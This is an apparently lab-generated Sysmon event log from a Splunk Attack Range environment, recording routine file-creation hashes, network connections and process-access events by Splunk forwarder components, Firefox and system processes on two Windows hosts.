Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=01E2065938BBE440FEFEB60BA4722A1D,SHA256=7C03BE3E918D57FD1CC498BBCF0FC89DAFE73F50D6222BE75B31630645F77556,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001046672Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:08.622{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local50938-false10.0.1.12-8000- 354300x80000000000000001046671Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:07.908{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local50937-true0:0:0:0:0:0:0:1win-dc-890.attackrange.local389ldap 354300x80000000000000001046670Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:07.908{466BC892-02BC-60E8-2600-00000000CF01}2864C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local50937-true0:0:0:0:0:0:0:1win-dc-890.attackrange.local389ldap 23542300x80000000000000001046669Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:16.421{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DA3ED35F45E867208498E8E8B2BEFF68,SHA256=AE3117CBB1ED263BFD7275285F639A242EC1B38C698B6A7FF5953DADE4128D82,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046684Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:17.698{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=B70B008472171444522812C3BB0EAA63,SHA256=EFA97A8F9296F6CF8F87F0F85B4C51BA385C6AB23A21372603048508D03A172A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046683Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:17.698{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=911CEBD0475B5933CE3EE252D08CD97B,SHA256=CB96D0133BBF380616C08EEF9960B5E1B38FCEB271F3FBEB5520C89747EFDDB8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046682Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:17.698{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=ECED7715627E6A345E50E90A405C2F04,SHA256=10664B2055EB3197CE0AD2D7962F243A0B5C360A628525AA0B935CC47A760EE5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046681Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:17.698{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=3AD982EC0C8CF9B1A738F126CA289671,SHA256=E29DCA0D5D162C63B980713AF4F0A9D9D83AE6896A2079C7CC907CCD6598D7FA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046680Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:17.698{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=ABB5A2FB36BCD46416194B8A17C03A61,SHA256=DEAD0D2ABB37CF9ED3C1EC8A8611182DAFF731788907FD279EB21D8B16AD9A77,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046679Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:17.698{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=72887CE320B03B51ABE217229918DCE6,SHA256=BB8FB3C874DEE07D02AB0F7F87D2DCBCDC35695C4BF3524CCCB105DC9D64D714,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046678Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:17.698{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=C450B31BEB0205EF7893256062B8026B,SHA256=941C0B567853E5BD54BD738773E2B01E3518036C25D9F62D12A0B057E1907E8D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046677Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:17.698{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=A70428FE3887C72B874A35E157F9B7A1,SHA256=AD612D51619E0A7DE63FBEF4BCBC16E8B24EC9F1716EC7B7A3C3B720F2F62B94,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046676Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:17.698{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=F2FB32B56002262DAAF5907594E5DED6,SHA256=E481E79580C3DF12C9FB130E4EA0854C6185695B3E62AAE5310F3FE7E1E441A0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046675Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:17.698{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=624B4DC8C0201256DB14AC31C2396FFC,SHA256=837FADEBC6F7EA0EA27EEA3A0CB4401763E5442472C2A25DE60751F19DF73C9F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046674Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:17.698{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=EEEE7D9F616589E5520D33F6F1AD3505,SHA256=1FBC528D79503A697933A055BC2A6974301A695D2776BAA5FC4F5C68FDC1743A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046673Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:17.435{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3A6E2055C4EDDE02FD1886EC1CB63431,SHA256=AB9D085A5D632758662A51A0591FE004DB9514FAB2B853A78FC7CD2D7A301677,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806438Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:17.032{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0DFCDB62B4C834189CCE0CF29202A4C6,SHA256=E6290C8D94C7ADD6A9BD62561CBBD95B546227C713CA6FCEAC9CF39FE0DDFF75,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046686Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:18.450{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F11C537FF859D24FFE246F99C85F7D24,SHA256=56AB9062427CE84E322F04B52CF5B16D72373514AC6916BB80BC1F3E42BCEAFA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806439Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:18.063{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7ECBB0B2722BEE36F9489616C315E450,SHA256=9C1F21DFE41CE4DC9A3C6DCB117653C7EA93A47FD84E786C582F440BB0C9E8FC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046685Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:18.198{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\storage\default\https+++twitter.com\idb\1046228012scyn.sqlite-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046687Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:19.465{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=07C098B9E35AF4F279E94799DE0F14A0,SHA256=C6681F09F043C9C2BFB05FD78E1C89B2D42755980E3E0C171E469C1ED21E97D5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806440Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:19.079{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A8F6863720EC6CF0E96694008E77AAC7,SHA256=AF3F258A25C993EA3CE0B149232E8EE96E3DF501B46B6A24621230140168B81B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046688Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:20.495{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B3E98173A3F61E267E2F9912F1838893,SHA256=03C26FAC7086242074DECCD73B04F3646282A20E4B7D24698447213D3AAC8439,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806442Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:20.360{0C1E0330-050B-60E8-9B00-00000000D001}1020NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=DD4D1D185AB4AED8A391DDEB7814ED87,SHA256=CA570F672172721E4189F1D4FCAE899B45A155271730C13B6A88FE6BC47AB312,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806441Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:20.079{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F190E31F121AD861D933B0AA3C7933C6,SHA256=748F62CDE55F74027923465C66838D6EF12C52E4BF7FCAE2F12E084FF9C96684,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001046690Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:13.733{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local50939-false10.0.1.12-8000- 23542300x80000000000000001046689Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:21.515{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E8424B0E97B4865142B343F46E095251,SHA256=9B75C1E65D85EA7EC0B649E81C987D048153AEAA1105442D94B0953262F69A4C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806443Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:21.110{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D79C95E04FD20144ACB48E5FB1B2E98C,SHA256=CCE028F3E51BAE5F62CA32D2050657C9DD7FAC56D407830987F38A37B1CDB871,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046691Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:22.531{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5F6ECCA643F2018B9CEBC5039D54EB04,SHA256=41B3DD55FFFFEBC62BCF6A99C7C0E41F21F191B37218977B272154D9A24D3C05,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806446Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:22.157{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FD5F2104E0F3099C0B3D12BD07406FAD,SHA256=6017AFA7FF267D2B271495B98A0D49A9E960F7AF9C5723F1BDABB0932A663758,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000806445Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:20.493{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57188-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8089- 354300x8000000000000000806444Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:20.259{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57187-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001046692Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:23.546{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8DB6BEC7A712BACCA945E97037A05CCC,SHA256=5608B113073C45A150EBE87C3E94ACC248DE7D30F7256BE05A3426CEBE20F304,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806447Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:23.173{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=23C49D6CB31732CFCF4DAD1EC1BB2090,SHA256=6BD7AFF281C5F5BF0DCC3C10BAD6EFBF820A65264AFA5E1C298859D4CCF15A11,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046693Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:24.561{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1DA37CC67380B306A205F8AA698F5F3E,SHA256=F55655DAB24CFCB889D5334D0B32EEE9C82C4BB19717B109C3510E70B9F11545,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000806475Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:24.923{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F350-60EB-4A79-00000000D001}3824C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806474Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:24.923{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806473Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:24.923{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806472Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:24.923{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806471Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:24.923{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806470Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:24.923{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806469Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:24.923{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806468Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:24.923{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806467Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 